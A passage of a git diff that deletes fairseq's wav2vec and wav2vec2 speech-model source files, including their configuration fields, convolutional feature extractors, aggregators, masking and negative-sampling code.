metadata={ - "help": "convolutional aggregator layers [(dim, kernel_size, stride), ...]" - }, - ) - dropout: float = field( - default=0.0, metadata={"help": "dropout to apply within the model"} - ) - dropout_features: float = field( - default=0.0, metadata={"help": "dropout to apply to the features"} - ) - dropout_agg: float = field( - default=0.0, metadata={"help": "dropout to apply after aggregation step"} - ) - aggregator: AGGREGATOR_CHOICES = field( - default="cnn", metadata={"help": "type of aggregator to use"} - ) - gru_dim: int = field(default=512, metadata={"help": "GRU dimensionality"}) - no_conv_bias: bool = field( - default=False, metadata={"help": "if set, does not learn bias for conv layers"} - ) - agg_zero_pad: bool = field( - default=False, - metadata={"help": "if set, zero pads in aggregator instead of repl pad"}, - ) - skip_connections_feat: bool = field( - default=False, - metadata={"help": "if set, adds skip connections to the feature extractor"}, - ) - skip_connections_agg: bool = field( - default=True, - metadata={"help": "if set, adds skip connections to the aggregator"}, - ) - residual_scale: float = field( - default=0.5, metadata={"help": "scales residual by sqrt(value)"} - ) - log_compression: bool = field( - default=True, - metadata={"help": "if set, adds a log compression to feature extractor"}, - ) - balanced_classes: bool = field( - default=False, - metadata={"help": "if set, loss is scaled to balance for number of negatives"}, - ) - project_features: PROJECT_FEATURES_CHOICES = field( - default="none", - metadata={ - "help": "if not none, features are projected using the (same or new) aggregator" - }, - ) - non_affine_group_norm: bool = field( - default=False, metadata={"help": "if set, group norm is not affine"} - ) - offset: str = field( - default="auto", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - activation: ACTIVATION_CHOICES = field( - default="relu", - metadata={ - "help": "if set to 'auto', it is computed automatically from the receptive field, else set to int value" - }, - ) - vq_type: VQ_TYPE_CHOICES = field( - default="none", metadata={"help": "which type of quantizer to use"} - ) - vq_vars: int = field( - default=320, - metadata={"help": "project to this many vector quantized variables per group"}, - ) - vq_groups: int = field( - default=2, metadata={"help": "number of groups of latent variables"} - ) - vq_dim: int = field( - default=0, - metadata={ - "help": "uses this dimensionality for quantized vectors. 0 to use model dim // groups" - }, - ) - vq_depth: int = field( - default=1, metadata={"help": "number of layers for vq weight projection"} - ) - combine_groups: bool = field( - default=False, metadata={"help": "if set, variables are shared among groups"} - ) - vq_temp: Tuple[float, float, float] = field( - default=(2.0, 0.5, 0.999995), - metadata={ - "help": "temperature for latent variable sampling with gumbel softmax. should be a tuple of 3 values (start, end, decay)" - }, - ) - vq_gamma: float = field( - default=0.25, - metadata={"help": "gamma parameter for kmeans style vector quantization"}, - ) - infonce: bool = II("criterion.infonce") - - -@register_model("wav2vec", dataclass=Wav2VecConfig) -class Wav2VecModel(BaseFairseqModel): - @classmethod - def build_model(cls, cfg: Wav2VecConfig, task: FairseqTask): - """Build a new model instance.""" - - model = Wav2VecModel(cfg) - logger.info(model) - return model - - def __init__(self, cfg: Wav2VecConfig): - super().__init__() - - self.prediction_steps = cfg.prediction_steps - offset = cfg.offset - - if cfg.activation == "relu": - activation = nn.ReLU() - elif cfg.activation == "gelu": - activation = nn.GELU() - else: - raise Exception("unknown activation " + cfg.activation) - - feature_enc_layers = eval(cfg.conv_feature_layers) - self.feature_extractor = ConvFeatureExtractionModel( - conv_layers=feature_enc_layers, - dropout=0.0, - log_compression=cfg.log_compression, - skip_connections=cfg.skip_connections_feat, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - activation=activation, - ) - embed = feature_enc_layers[-1][0] - - self.vector_quantizer = None - if cfg.vq_type == "gumbel": - self.vector_quantizer = GumbelVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - temp=cfg.vq_temp, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - activation=activation, - weight_proj_depth=cfg.vq_depth, - weight_proj_factor=2, - ) - elif cfg.vq_type == "kmeans": - self.vector_quantizer = KmeansVectorQuantizer( - dim=embed, - num_vars=cfg.vq_vars, - groups=cfg.vq_groups, - combine_groups=cfg.combine_groups, - vq_dim=cfg.vq_dim if cfg.vq_dim > 0 else embed, - time_first=False, - gamma=cfg.vq_gamma, - ) - else: - assert ( - cfg.vq_type == "none" or cfg.vq_type is None - ), "Unknown quantizer type" - - if cfg.offset == "auto": - jin = 0 - rin = 0 - for _, k, stride in feature_enc_layers: - if rin == 0: - rin = k - rin = rin + (k - 1) * jin - if jin == 0: - jin = stride - else: - jin *= stride - offset = math.ceil(rin / jin) - - offset = int(offset) - - def make_aggregator(): - if cfg.aggregator == "cnn": - agg_layers = eval(cfg.conv_aggregator_layers) - agg_dim = agg_layers[-1][0] - feature_aggregator = ConvAggegator( - conv_layers=agg_layers, - embed=embed, - dropout=cfg.dropout, - skip_connections=cfg.skip_connections_agg, - residual_scale=cfg.residual_scale, - non_affine_group_norm=cfg.non_affine_group_norm, - conv_bias=not cfg.no_conv_bias, - zero_pad=cfg.agg_zero_pad, - activation=activation, - ) - elif cfg.aggregator == "gru": - agg_dim = cfg.gru_dim - feature_aggregator = nn.Sequential( - TransposeLast(), - nn.GRU( - input_size=embed, - hidden_size=agg_dim, - num_layers=1, - dropout=cfg.dropout, - ), - TransposeLast(deconstruct_idx=0), - ) - else: - raise Exception("unknown aggregator type " + cfg.aggregator) - - return feature_aggregator, agg_dim - - self.feature_aggregator, agg_dim = make_aggregator() - - self.wav2vec_predictions = Wav2VecPredictionsModel( - in_dim=agg_dim, - out_dim=embed, - prediction_steps=cfg.prediction_steps, - n_negatives=cfg.num_negatives, - cross_sample_negatives=cfg.cross_sample_negatives, - sample_distance=cfg.sample_distance, - dropout=cfg.dropout, - offset=offset, - balanced_classes=cfg.balanced_classes, - infonce=cfg.infonce, - ) - - self.dropout_feats = nn.Dropout(p=cfg.dropout_features) - self.dropout_agg = nn.Dropout(p=cfg.dropout_agg) - - if cfg.project_features == "none": - self.project_features = None - elif cfg.project_features == "same": - self.project_features = self.feature_aggregator - elif cfg.project_features == "new": - self.project_features, _ = make_aggregator() - - def forward(self, source): - result = {} - - features = self.feature_extractor(source) - if self.vector_quantizer: - q_res = self.vector_quantizer(features) - features = q_res["x"] - for k in q_res.keys(): - if k != "x": - result[k] = q_res[k] - - x = self.dropout_feats(features) - x = self.feature_aggregator(x) - x = self.dropout_agg(x) - - if self.project_features is not None: - features = self.project_features(features) - x, targets = self.wav2vec_predictions(x, features) - result["cpc_logits"] = x - result["cpc_targets"] = targets - - return result - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - - def max_positions(self): - """Maximum length supported by the model.""" - return sys.maxsize - - def get_logits(self, net_output): - logits = net_output["cpc_logits"] - return logits - - def get_targets(self, sample, net_output): - t = net_output["cpc_targets"] - if isinstance(t, tuple): - t = t[0] - return t.contiguous() - - def get_target_weights(self, targets, net_output): - targets = net_output["cpc_targets"] - if isinstance(targets, tuple) and targets[-1] is not None: - return targets[-1] - return None - - def get_extra_losses(self, net_output): - loss = None - if "prob_perplexity" in net_output: - loss = net_output["num_vars"] - net_output["prob_perplexity"] - elif "kmeans_loss" in net_output: - loss = net_output["kmeans_loss"] - - return loss - - -def norm_block(is_layer_norm, dim, affine=True): - if is_layer_norm: - mod = nn.Sequential( - TransposeLast(), - Fp32LayerNorm(dim, elementwise_affine=affine), - TransposeLast(), - ) - else: - mod = Fp32GroupNorm(1, dim, affine=affine) - - return mod - - -class ConvFeatureExtractionModel(nn.Module): - def __init__( - self, - conv_layers, - dropout, - log_compression, - skip_connections, - residual_scale, - non_affine_group_norm, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - return nn.Sequential( - nn.Conv1d(n_in, n_out, k, stride=stride, bias=False), - nn.Dropout(p=dropout), - norm_block( - is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm - ), - activation, - ) - - in_d = 1 - self.conv_layers = nn.ModuleList() - for dim, k, stride in conv_layers: - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - - self.log_compression = log_compression - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - # BxT -> BxCxT - x = x.unsqueeze(1) - - for conv in self.conv_layers: - residual = x - x = conv(x) - if self.skip_connections and x.size(1) == residual.size(1): - tsz = x.size(2) - r_tsz = residual.size(2) - residual = residual[..., :: r_tsz // tsz][..., :tsz] - x = (x + residual) * self.residual_scale - - if self.log_compression: - x = x.abs() - x = x + 1 - x = x.log() - - return x - - -class ZeroPad1d(nn.Module): - def __init__(self, pad_left, pad_right): - super().__init__() - self.pad_left = pad_left - self.pad_right = pad_right - - def forward(self, x): - return F.pad(x, (self.pad_left, self.pad_right)) - - -class ConvAggegator(nn.Module): - def __init__( - self, - conv_layers, - embed, - dropout, - skip_connections, - residual_scale, - non_affine_group_norm, - conv_bias, - zero_pad, - activation, - ): - super().__init__() - - def block(n_in, n_out, k, stride): - # padding dims only really make sense for stride = 1 - ka = k // 2 - kb = ka - 1 if k % 2 == 0 else ka - - pad = ( - ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0)) - ) - - return nn.Sequential( - pad, - nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias), - nn.Dropout(p=dropout), - norm_block(False, n_out, affine=not non_affine_group_norm), - activation, - ) - - in_d = embed - self.conv_layers = nn.ModuleList() - self.residual_proj = nn.ModuleList() - for dim, k, stride in conv_layers: - if in_d != dim and skip_connections: - self.residual_proj.append(nn.Conv1d(in_d, dim, 1, bias=False)) - else: - self.residual_proj.append(None) - - self.conv_layers.append(block(in_d, dim, k, stride)) - in_d = dim - self.conv_layers = nn.Sequential(*self.conv_layers) - self.skip_connections = skip_connections - self.residual_scale = math.sqrt(residual_scale) - - def forward(self, x): - for rproj, conv in zip(self.residual_proj, self.conv_layers): - residual = x - x = conv(x) - if self.skip_connections: - if rproj is not None: - residual = rproj(residual) - x = (x + residual) * self.residual_scale - return x - - -class Wav2VecPredictionsModel(nn.Module): - def __init__( - self, - in_dim, - out_dim, - prediction_steps, - n_negatives, - cross_sample_negatives, - sample_distance, - dropout, - offset, - balanced_classes, - infonce, - ): - super().__init__() - - self.n_negatives = n_negatives - self.cross_sample_negatives = cross_sample_negatives - self.sample_distance = sample_distance - self.project_to_steps = nn.ConvTranspose2d( - in_dim, out_dim, (1, prediction_steps) - ) - self.dropout = nn.Dropout(p=dropout) - self.offset = offset - self.balanced_classes = balanced_classes - self.infonce = infonce - - def sample_negatives(self, y): - bsz, fsz, tsz = y.shape - - y = y.transpose(0, 1) # BCT -> CBT - y = y.contiguous().view(fsz, -1) # CBT => C(BxT) - - cross_high = tsz * bsz - high = tsz if self.sample_distance is None else min(tsz, self.sample_distance) - assert high > 1 - - neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz)) - - with torch.no_grad(): - if self.n_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.n_negatives) - .flatten() - ) - - neg_idxs = torch.randint( - low=0, high=high - 1, size=(bsz, self.n_negatives * tsz) - ) - neg_idxs[neg_idxs >= tszs] += 1 - - if self.cross_sample_negatives > 0: - tszs = ( - buffered_arange(tsz) - .unsqueeze(-1) - .expand(-1, self.cross_sample_negatives) - .flatten() - ) - - cross_neg_idxs = torch.randint( - low=0, - high=cross_high - 1, - size=(bsz, self.cross_sample_negatives * tsz), - ) - cross_neg_idxs[cross_neg_idxs >= tszs] += 1 - - if self.n_negatives > 0: - for i in range(1, bsz): - neg_idxs[i] += i * high - else: - neg_idxs = cross_neg_idxs - - if self.cross_sample_negatives > 0 and self.n_negatives > 0: - neg_idxs = torch.cat([neg_idxs, cross_neg_idxs], dim=1) - - negs = y[..., neg_idxs.view(-1)] - negs = negs.view( - fsz, bsz, self.n_negatives + self.cross_sample_negatives, tsz - ).permute( - 2, 1, 0, 3 - ) # to NxBxCxT - - return negs - - def forward(self, x, y): - - x = x.unsqueeze(-1) - x = self.project_to_steps(x) # BxCxTxS - x = self.dropout(x) - - negatives = self.sample_negatives(y) - y = y.unsqueeze(0) - targets = torch.cat([y, negatives], dim=0) # Copies x B x C x T - - copies = targets.size(0) - bsz, dim, tsz, steps = x.shape - steps = min(steps, tsz - self.offset) - - predictions = x.new( - bsz * copies * (tsz - self.offset + 1) * steps - - ((steps + 1) * steps // 2) * copies * bsz - ) - if self.infonce: - labels = predictions.new_full( - (predictions.shape[0] // copies,), 0, dtype=torch.long - ) - else: - labels = torch.zeros_like(predictions) - weights = ( - torch.full_like(labels, 1 / self.n_negatives) - if self.balanced_classes and not self.infonce - else None - ) - - start = end = 0 - for i in range(steps): - offset = i + self.offset - end = start + (tsz - offset) * bsz * copies - if self.infonce: - predictions[start:end] = torch.einsum( - "bct,nbct->tbn", x[..., :-offset, i], targets[..., offset:] - ).flatten() - else: - pos_num = (end - start) // copies - predictions[start:end] = torch.einsum( - "bct,nbct->nbt", x[..., :-offset, i], targets[..., offset:] - ).flatten() - labels[start : start + pos_num] = 1.0 - if weights is not None: - weights[start : start + pos_num] = 1.0 - start = end - assert end == predictions.numel(), "{} != {}".format(end, predictions.numel()) - - if self.infonce: - predictions = predictions.view(-1, copies) - else: - if weights is not None: - labels = (labels, weights) - - return predictions, labels diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec2.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec2.py deleted file mode 100644 index 714fd3ab50443b8d15715b1cf5abd4eb517298c4..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec2.py +++ /dev/null @@ -1,1016 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math -from dataclasses import dataclass, field -from typing import List, Tuple - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import utils -from fairseq.data.data_utils import compute_mask_indices -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.models import BaseFairseqModel, register_model -from fairseq.modules import ( - Fp32GroupNorm, - Fp32LayerNorm, - GradMultiply, - GumbelVectorQuantizer, - LayerNorm, - MultiheadAttention, - SamePad, - TransposeLast, -) -from fairseq.modules.transformer_sentence_encoder import init_bert_params -from fairseq.utils import buffered_arange, index_put, is_xla_tensor - - -EXTRACTOR_MODE_CHOICES = ChoiceEnum(["default", "layer_norm"]) -MASKING_DISTRIBUTION_CHOICES = ChoiceEnum(["static", "uniform", "normal", "poisson"]) - - -@dataclass -class Wav2Vec2Config(FairseqDataclass): - extractor_mode: EXTRACTOR_MODE_CHOICES = field( - default="default", - metadata={ - "help": "mode for feature extractor. default has a single group norm with d " - "groups in the first conv block, whereas layer_norm has layer norms in " - "every block (meant to use with normalize=True)" - }, - ) - encoder_layers: int = field( - default=12, metadata={"help": "num encoder layers in the transformer"} - ) - encoder_embed_dim: int = field( - default=768, metadata={"help": "encoder embedding dimension"} - ) - encoder_ffn_embed_dim: int = field( - default=3072, metadata={"help": "encoder embedding dimension for FFN"} - ) - encoder_attention_heads: int = field( - default=12, metadata={"help": "num encoder attention heads"} - ) - activation_fn: ChoiceEnum(utils.get_available_activation_fns()) = field( - default="gelu", metadata={"help": "activation function to use"} - ) - - # dropouts - dropout: float = field( - default=0.1, metadata={"help": "dropout probability for the transformer"} - ) - attention_dropout: float = field( - default=0.1, metadata={"help": "dropout probability for attention weights"} - ) - activation_dropout: float = field( - default=0.0, metadata={"help": "dropout probability after activation in FFN"} - ) - encoder_layerdrop: float = field( - default=0.0, metadata={"help": "probability of dropping a tarnsformer layer"} - ) - dropout_input: float = field( - default=0.0, - metadata={"help": "dropout to apply to the input (after feat extr)"}, - ) - dropout_features: float = field( - default=0.0, - metadata={"help": "dropout to apply to the features (after feat extr)"}, - ) - - final_dim: int = field( - default=0, - metadata={ - "help": "project final representations and targets to this many dimensions." - "set to encoder_embed_dim is <= 0" - }, - ) - layer_norm_first: bool = field( - default=False, metadata={"help": "apply layernorm first in the transformer"} - ) - conv_feature_layers: str = field( - default="[(512, 10, 5)] + [(512, 3, 2)] * 4 + [(512,2,2)] + [(512,2,2)]", - metadata={ - "help": "string describing convolutional feature extraction layers in form of a python list that contains " - "[(dim, kernel_size, stride), ...]" - }, - ) - conv_bias: bool = field( - default=False, metadata={"help": "include bias in conv encoder"} - ) - logit_temp: float = field( - default=0.1, metadata={"help": "temperature to divide logits by"} - ) - quantize_targets: bool = field( - default=False, metadata={"help": "use quantized targets"} - ) - quantize_input: bool = field( - default=False, metadata={"help": "use quantized inputs"} - ) - same_quantizer: bool = field( - default=False, metadata={"help": "use same quantizer for inputs and targets"} - ) - target_glu: bool = field( - default=False, metadata={"help": "adds projection + glu to targets"} - ) - feature_grad_mult: float = field( - default=1.0, metadata={"help": "multiply feature extractor var grads by this"} - ) - quantizer_depth: int = field( - default=1, - metadata={"help": "number of quantizer layers"}, - ) - quantizer_factor: int = field( - default=3, - metadata={ - "help": "dimensionality increase for inner quantizer layers (if depth > 1)" - }, - ) - latent_vars: int = field( - default=320, - metadata={"help": "number of latent variables V in each group of the codebook"}, - ) - latent_groups: int = field( - default=2, - metadata={"help": "number of groups G of latent variables in the codebook"}, - ) - latent_dim: int = field( - default=0, - metadata={ - "help": "if > 0, uses this dimensionality for latent variables. " - "otherwise uses final_dim / latent_groups" - }, - ) - - # masking - mask_length: int = field(default=10, metadata={"help": "mask length"}) - mask_prob: float = field( - default=0.65, metadata={"help": "probability of replacing a token with mask"} - ) - mask_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", metadata={"help": "how to choose mask length"} - ) - mask_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indices" - }, - ) - no_mask_overlap: bool = field( - default=False, metadata={"help": "whether to allow masks to overlap"} - ) - mask_min_space: int = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - - # channel masking - mask_channel_length: int = field( - default=10, metadata={"help": "length of the mask for features (channels)"} - ) - mask_channel_prob: float = field( - default=0.0, metadata={"help": "probability of replacing a feature with 0"} - ) - mask_channel_before: bool = False - mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", - metadata={"help": "how to choose mask length for channel masking"}, - ) - mask_channel_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indicesh" - }, - ) - no_mask_channel_overlap: bool = field( - default=False, metadata={"help": "whether to allow channel masks to overlap"} - ) - mask_channel_min_space: int = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - - # negative selection - num_negatives: int = field( - default=100, - metadata={"help": "number of negative examples from the same sample"}, - ) - negatives_from_everywhere: bool = field( - default=False, - metadata={"help": "sample negatives from everywhere, not just masked states"}, - ) - cross_sample_negatives: int = field( - default=0, metadata={"help": "number of negative examples from the any sample"} - ) - codebook_negatives: int = field( - default=0, metadata={"help": "number of negative examples codebook"} - ) - - # positional embeddings - conv_pos: int = field( - default=128, - metadata={"help": "number of filters for convolutional positional embeddings"}, - ) - conv_pos_groups: int = field( - default=16, - metadata={"help": "number of groups for convolutional positional embedding"}, - ) - - latent_temp: Tuple[float, float, float] = field( - default=(2, 0.5, 0.999995), - metadata={ - "help": "temperature for latent variable sampling. " - "can be tuple of 3 values (start, end, decay)" - }, - ) - - -@register_model("wav2vec2", dataclass=Wav2Vec2Config) -class Wav2Vec2Model(BaseFairseqModel): - def __init__(self, cfg: Wav2Vec2Config): - super().__init__() - self.cfg = cfg - - feature_enc_layers = eval(cfg.conv_feature_layers) - self.embed = feature_enc_layers[-1][0] - - self.feature_extractor = ConvFeatureExtractionModel( - conv_layers=feature_enc_layers, - dropout=0.0, - mode=cfg.extractor_mode, - conv_bias=cfg.conv_bias, - ) - - self.post_extract_proj = ( - nn.Linear(self.embed, cfg.encoder_embed_dim) - if self.embed != cfg.encoder_embed_dim and not cfg.quantize_input - else None - ) - - self.mask_prob = cfg.mask_prob - self.mask_selection = cfg.mask_selection - self.mask_other = cfg.mask_other - self.mask_length = cfg.mask_length - self.no_mask_overlap = cfg.no_mask_overlap - self.mask_min_space = cfg.mask_min_space - - self.mask_channel_prob = cfg.mask_channel_prob - self.mask_channel_before = cfg.mask_channel_before - self.mask_channel_selection = cfg.mask_channel_selection - self.mask_channel_other = cfg.mask_channel_other - self.mask_channel_length = cfg.mask_channel_length - self.no_mask_channel_overlap = cfg.no_mask_channel_overlap - self.mask_channel_min_space = cfg.mask_channel_min_space - - self.dropout_input = nn.Dropout(cfg.dropout_input) - self.dropout_features = nn.Dropout(cfg.dropout_features) - - self.feature_grad_mult = cfg.feature_grad_mult - - self.quantizer = None - self.input_quantizer = None - - self.n_negatives = cfg.num_negatives - self.cross_sample_negatives = cfg.cross_sample_negatives - self.codebook_negatives = cfg.codebook_negatives - self.negatives_from_everywhere = cfg.negatives_from_everywhere - - self.logit_temp = cfg.logit_temp - - final_dim = cfg.final_dim if cfg.final_dim > 0 else cfg.encoder_embed_dim - - if cfg.quantize_targets: - vq_dim = cfg.latent_dim if cfg.latent_dim > 0 else final_dim - self.quantizer = GumbelVectorQuantizer( - dim=self.embed, - num_vars=cfg.latent_vars, - temp=cfg.latent_temp, - groups=cfg.latent_groups, - combine_groups=False, - vq_dim=vq_dim, - time_first=True, - weight_proj_depth=cfg.quantizer_depth, - weight_proj_factor=cfg.quantizer_factor, - ) - self.project_q = nn.Linear(vq_dim, final_dim) - else: - self.project_q = nn.Linear(self.embed, final_dim) - - if cfg.quantize_input: - if cfg.same_quantizer and self.quantizer is not None: - vq_dim = final_dim - self.input_quantizer = self.quantizer - else: - vq_dim = cfg.latent_dim if cfg.latent_dim > 0 else cfg.encoder_embed_dim - self.input_quantizer = GumbelVectorQuantizer( - dim=self.embed, - num_vars=cfg.latent_vars, - temp=cfg.latent_temp, - groups=cfg.latent_groups, - combine_groups=False, - vq_dim=vq_dim, - time_first=True, - weight_proj_depth=cfg.quantizer_depth, - weight_proj_factor=cfg.quantizer_factor, - ) - self.project_inp = nn.Linear(vq_dim, cfg.encoder_embed_dim) - - self.mask_emb = nn.Parameter( - torch.FloatTensor(cfg.encoder_embed_dim).uniform_() - ) - - self.encoder = TransformerEncoder(cfg) - self.layer_norm = LayerNorm(self.embed) - - self.target_glu = None - if cfg.target_glu: - self.target_glu = nn.Sequential( - nn.Linear(final_dim, final_dim * 2), nn.GLU() - ) - - self.final_proj = nn.Linear(cfg.encoder_embed_dim, final_dim) - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - """Upgrade a (possibly old) state dict for new versions of fairseq.""" - return state_dict - - @classmethod - def build_model(cls, cfg: Wav2Vec2Config, task=None): - """Build a new model instance.""" - - return cls(cfg) - - def apply_mask( - self, - x, - padding_mask, - mask_indices=None, - mask_channel_indices=None, - ): - B, T, C = x.shape - - if self.mask_channel_prob > 0 and self.mask_channel_before: - mask_channel_indices = compute_mask_indices( - (B, C), - None, - self.mask_channel_prob, - self.mask_channel_length, - self.mask_channel_selection, - self.mask_channel_other, - no_overlap=self.no_mask_channel_overlap, - min_space=self.mask_channel_min_space, - ) - mask_channel_indices = ( - torch.from_numpy(mask_channel_indices) - .to(x.device) - .unsqueeze(1) - .expand(-1, T, -1) - ) - x[mask_channel_indices] = 0 - - if self.mask_prob > 0: - if mask_indices is None: - mask_indices = compute_mask_indices( - (B, T), - padding_mask, - self.mask_prob, - self.mask_length, - self.mask_selection, - self.mask_other, - min_masks=2, - no_overlap=self.no_mask_overlap, - min_space=self.mask_min_space, - ) - mask_indices = torch.from_numpy(mask_indices).to(x.device) - x = index_put(x, mask_indices, self.mask_emb) - else: - mask_indices = None - - if self.mask_channel_prob > 0 and not self.mask_channel_before: - if mask_channel_indices is None: - mask_channel_indices = compute_mask_indices( - (B, C), - None, - self.mask_channel_prob, - self.mask_channel_length, - self.mask_channel_selection, - self.mask_channel_other, - no_overlap=self.no_mask_channel_overlap, - min_space=self.mask_channel_min_space, - ) - mask_channel_indices = ( - torch.from_numpy(mask_channel_indices) - .to(x.device) - .unsqueeze(1) - .expand(-1, T, -1) - ) - x = index_put(x, mask_channel_indices, 0) - - return x, mask_indices - - def sample_negatives(self, y, num, padding_count=None): - - if self.n_negatives == 0 and self.cross_sample_negatives == 0: - return y.new(0) - - bsz, tsz, fsz = y.shape - y = y.view(-1, fsz) # BTC => (BxT)C - - # FIXME: what happens if padding_count is specified? - cross_high = tsz * bsz - high = tsz - (padding_count or 0) - with torch.no_grad(): - assert high > 1, f"{bsz,tsz,fsz}" - - if self.n_negatives > 0: - tszs = ( - buffered_arange(num) - .unsqueeze(-1) - .expand(-1, self.n_negatives) - .flatten() - ) - - neg_idxs = torch.randint( - low=0, high=high - 1, size=(bsz, self.n_negatives * num) - ) - neg_idxs[neg_idxs >= tszs] += 1 - - if self.cross_sample_negatives > 0: - tszs = ( - buffered_arange(num) - .unsqueeze(-1) - .expand(-1, self.cross_sample_negatives) - .flatten() - ) - - cross_neg_idxs = torch.randint( - low=0, - high=cross_high - 1, - size=(bsz, self.cross_sample_negatives * num), - ) - cross_neg_idxs[cross_neg_idxs >= tszs] += 1 - - if self.n_negatives > 0: - for i in range(1, bsz): - neg_idxs[i] += i * high - else: - neg_idxs = cross_neg_idxs - - if self.cross_sample_negatives > 0 and self.n_negatives > 0: - neg_idxs = torch.cat([neg_idxs, cross_neg_idxs], dim=1) - - negs = y[neg_idxs.view(-1)] - negs = negs.view( - bsz, num, self.n_negatives + self.cross_sample_negatives, fsz - ).permute( - 2, 0, 1, 3 - ) # to NxBxTxC - return negs, neg_idxs - - def compute_preds(self, x, y, negatives): - - neg_is_pos = (y == negatives).all(-1) - y = y.unsqueeze(0) - targets = torch.cat([y, negatives], dim=0) - - logits = torch.cosine_similarity(x.float(), targets.float(), dim=-1).type_as(x) - - logits = logits / self.logit_temp - - if is_xla_tensor(logits) or neg_is_pos.any(): - fillval = -float(2 ** 30) - if not hasattr(self, "_inftensor"): - self._inftensor = ( - torch.tensor(fillval).to(x.device) - if is_xla_tensor(logits) - else float("-inf") - ) - logits[1:] = index_put(logits[1:], neg_is_pos, self._inftensor) - - return logits - - def _get_feat_extract_output_lengths(self, input_lengths: torch.LongTensor): - """ - Computes the output length of the convolutional layers - """ - - def _conv_out_length(input_length, kernel_size, stride): - return torch.floor((input_length - kernel_size) / stride + 1) - - conv_cfg_list = eval(self.cfg.conv_feature_layers) - - for i in range(len(conv_cfg_list)): - input_lengths = _conv_out_length( - input_lengths, conv_cfg_list[i][1], conv_cfg_list[i][2] - ) - - return input_lengths.to(torch.long) - - def forward( - self, - source, - padding_mask=None, - mask=True, - features_only=False, - layer=None, - mask_indices=None, - mask_channel_indices=None, - padding_count=None, - ): - - if self.feature_grad_mult > 0: - features = self.feature_extractor(source) - if self.feature_grad_mult != 1.0: - features = GradMultiply.apply(features, self.feature_grad_mult) - else: - with torch.no_grad(): - features = self.feature_extractor(source) - - features_pen = features.float().pow(2).mean() - - features = features.transpose(1, 2) - features = self.layer_norm(features) - unmasked_features = features.clone() - - if padding_mask is not None and padding_mask.any(): - input_lengths = (1 - padding_mask.long()).sum(-1) - # apply conv formula to get real output_lengths - output_lengths = self._get_feat_extract_output_lengths(input_lengths) - - padding_mask = torch.zeros( - features.shape[:2], dtype=features.dtype, device=features.device - ) - - # these two operations makes sure that all values - # before the output lengths indices are attended to - padding_mask[ - ( - torch.arange(padding_mask.shape[0], device=padding_mask.device), - output_lengths - 1, - ) - ] = 1 - padding_mask = (1 - padding_mask.flip([-1]).cumsum(-1).flip([-1])).bool() - else: - padding_mask = None - - if self.post_extract_proj is not None: - features = self.post_extract_proj(features) - - features = self.dropout_input(features) - unmasked_features = self.dropout_features(unmasked_features) - - num_vars = None - code_ppl = None - prob_ppl = None - curr_temp = None - - if self.input_quantizer: - q = self.input_quantizer(features, produce_targets=False) - features = q["x"] - num_vars = q["num_vars"] - code_ppl = q["code_perplexity"] - prob_ppl = q["prob_perplexity"] - curr_temp = q["temp"] - features = self.project_inp(features) - - if mask: - x, mask_indices = self.apply_mask( - features, - padding_mask, - mask_indices=mask_indices, - mask_channel_indices=mask_channel_indices, - ) - if not is_xla_tensor(x) and mask_indices is not None: - # tpu-comment: reducing the size in a dynamic way causes - # too many recompilations on xla. - y = unmasked_features[mask_indices].view( - unmasked_features.size(0), -1, unmasked_features.size(-1) - ) - else: - y = unmasked_features - else: - x = features - y = unmasked_features - mask_indices = None - - x, layer_results = self.encoder(x, padding_mask=padding_mask, layer=layer) - - if features_only: - return { - "x": x, - "padding_mask": padding_mask, - "features": unmasked_features, - "layer_results": layer_results, - } - - if self.quantizer: - q = self.quantizer(y, produce_targets=False) - y = q["x"] - num_vars = q["num_vars"] - code_ppl = q["code_perplexity"] - prob_ppl = q["prob_perplexity"] - curr_temp = q["temp"] - - y = self.project_q(y) - - if self.negatives_from_everywhere: - neg_cands = self.quantizer(unmasked_features, produce_targets=False)[ - "x" - ] - negs, _ = self.sample_negatives( - neg_cands, - y.size(1), - padding_count=padding_count, - ) - negs = self.project_q(negs) - - else: - negs, _ = self.sample_negatives( - y, - y.size(1), - padding_count=padding_count, - ) - - if self.codebook_negatives > 0: - cb_negs = self.quantizer.sample_from_codebook( - y.size(0) * y.size(1), self.codebook_negatives - ) - cb_negs = cb_negs.view( - self.codebook_negatives, y.size(0), y.size(1), -1 - ) # order doesnt matter - cb_negs = self.project_q(cb_negs) - negs = torch.cat([negs, cb_negs], dim=0) - else: - y = self.project_q(y) - - if self.negatives_from_everywhere: - negs, _ = self.sample_negatives( - unmasked_features, - y.size(1), - padding_count=padding_count, - ) - 